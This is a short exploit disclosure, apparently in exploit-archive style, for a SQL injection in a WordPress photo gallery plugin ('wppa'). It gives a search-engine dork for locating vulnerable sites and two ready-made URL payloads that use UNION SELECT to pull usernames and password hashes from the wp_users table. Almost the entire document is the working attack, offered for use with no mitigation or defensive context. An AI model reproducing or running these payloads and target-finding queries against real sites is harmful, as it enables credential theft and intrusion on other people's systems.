*Script: Wordpress Photo Gallery Mod SQL Injection

Dork: allinurl:"/plugins/wppa/"

Bug Fount :  THE_MILLER
msn : the_miller[at]linuxmail[dot]org

ExpLoit :
1)Randomsite.com/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users--




2)Randomsite.com/?page_id=[gallery
page]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users--